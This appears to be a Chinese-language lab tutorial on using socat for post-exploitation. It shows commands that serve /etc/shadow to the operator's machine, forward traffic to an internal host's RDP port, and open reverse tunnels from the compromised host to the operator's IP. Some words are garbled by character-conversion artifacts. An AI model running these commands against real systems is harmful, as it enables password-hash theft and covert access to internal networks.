目錄
0x01 socat介紹
0x02 socat進行檔案傳輸
0x03 socat正向端口轉發
0x04 socat反向端口轉發
注:
邊界機器 Ubuntu 192.168.222.177
内網機器 win7 192.168.222.137
0x01 socat介紹
socat我們在前面也已經介紹過了,之前說的是Windows下的利用,如果沒有看到的朋友請移步【socat在Windows下的使用】,socat本身就是在Linux下使用的,非要将它放到Windows下使用難免會有水土不服嘛,這次就回到Linux上來進行socat的使用。
安裝的話,我們可以直接下載下傳安裝的,如果你非要去手動編譯的話,就自行去研究吧。
apt-get install socat
完成後來檢驗一下是否安裝成功
socat -h
0x02 socat進行檔案傳輸
首先,我們去邊界機器執行
socat -u /etc/shadow TCP4-LISTEN:55,reuseaddr
然後回到我們本機來下載下傳,這裡我本機是Windows的,不過不影響
socat.exe -u TCP4:192.168.222.177:55 OPEN:mima.txt,create
跟之前一樣,在哪裡執行create的,檔案就在哪裡
0x03 socat正向端口轉發
這裡,我們通過邊界主機去通路内網的主機
首先我們去邊界主機執行指令,将來自外部1000的流量全部都轉發到内網機器的3389端口上
socat TCP4-LISTEN:1000,fork TCP4:192.168.222.137:3389
然後我們到本地主機上連接配接
0x04 socat反向端口轉發
首先,我們在本地執行監聽
socat.exe tcp-listen:1000 tcp-listen:1001
然後,我們在邊緣機器上執行指令
注:10.1.135.96是我本地主機的IP
socat tcp4-connect:10.1.135.96:1000 tcp4:127.0.0.1:22
然後本地連接配接ssh
當然,直接連接配接内網的機器也是可以的
socat tcp4-connect:10.1.135.96:1000 tcp4:192.168.222.137:3389
然後回到本地連接配接遠端桌面
注意,整個過程一定要一氣呵成,如果中間出錯,本地的監聽也需要重新執行,否則将會一直報錯,如果出現問題,多嘗試幾次就好